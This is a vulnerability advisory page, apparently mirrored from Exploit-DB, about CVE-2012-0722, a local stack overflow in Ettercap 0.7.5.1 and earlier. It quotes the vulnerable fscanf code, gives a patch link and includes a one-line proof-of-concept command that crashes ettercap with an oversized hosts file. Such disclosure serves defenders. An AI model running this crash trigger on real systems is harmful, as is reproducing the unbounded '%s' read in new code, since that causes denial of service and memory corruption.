Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Ettercap Stack overflow (CWE-121) - exploit.company
header-logo
Suggest Exploit
vendor:
Ettercap
by:
Sajjad Pourali
3.3
CVSS
LOW
Stack overflow
121
CWE
Product Name: Ettercap
Affected Version From: 0.7.4 and earlier
Affected Version To: 0.7.5.1
Patch Exists: YES
Related CWE: CVE-2012-0722
CPE: ettercap
Metasploit:
Other Scripts:
Platforms Tested:
2012

Ettercap Stack overflow (CWE-121)

The Ettercap software version 0.7.5.1 and earlier is vulnerable to a stack overflow vulnerability, as identified by CWE-121. This vulnerability allows an attacker to execute arbitrary code or cause a denial of service (DoS) by sending a specially crafted input to the affected software. The vulnerability exists in the `ec_scan.c` file, specifically in the `fscanf` function call at line 633-635. By sending a maliciously crafted input, an attacker can trigger a stack overflow and potentially gain control over the affected system. This vulnerability has been assigned CVE-2012-0722.

Mitigation:

To mitigate this vulnerability, users are advised to apply the provided patch. The patch can be downloaded from the vendor's website at http://www.securation.com/files/2013/01/ec.patch.
Source

Exploit-DB raw data:

Title: Ettercap Stack overflow (CWE-121)
References: CVE-2012-0722
Discovered by: Sajjad Pourali
Vendor: http://www.ettercap.sourceforge.net/
Vendor contact: 13-01-01 21:20 UTC (No response)
Solution: Using the patch
Patch: http://www.securation.com/files/2013/01/ec.patch

Local: Yes
Remote: No
Impact: low

Affected:
 - ettercap 0.7.5.1
 - ettercap 0.7.5
 - ettercap 0.7.4 and earlier
Not affected:
 - ettercap 0.7.4.1

---

Trace vulnerable place:

./include/ec_inet.h:27-44
enum {
   NS_IN6ADDRSZ            = 16,
   NS_INT16SZ              = 2,

   ETH_ADDR_LEN            = 6,
   TR_ADDR_LEN             = 6,
   FDDI_ADDR_LEN           = 6,
   MEDIA_ADDR_LEN          = 6,

   IP_ADDR_LEN             = 4,
   IP6_ADDR_LEN            = 16,
   MAX_IP_ADDR_LEN         = IP6_ADDR_LEN,

   ETH_ASCII_ADDR_LEN      = sizeof("ff:ff:ff:ff:ff:ff")+1,
   IP_ASCII_ADDR_LEN       = sizeof("255.255.255.255")+1,
   IP6_ASCII_ADDR_LEN      = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,
   MAX_ASCII_ADDR_LEN      = IP6_ASCII_ADDR_LEN,
};

./include/ec_resolv.h:42
#define MAX_HOSTNAME_LEN   64

./src/ec_scan.c:610-614
char ip[MAX_ASCII_ADDR_LEN];
char mac[ETH_ASCII_ADDR_LEN];
char name[MAX_HOSTNAME_LEN];


./src/ec_scan.c:633-635
if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||
         *ip == '#' || *mac == '#' || *name == '#')
         continue;

---

PoC:

sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow

---

 + Sajjad Pourali
 + http://www.securation.com
 + Contact: sajjad[at]securation.com

Navigation

Suggest Exploit

Services By CQR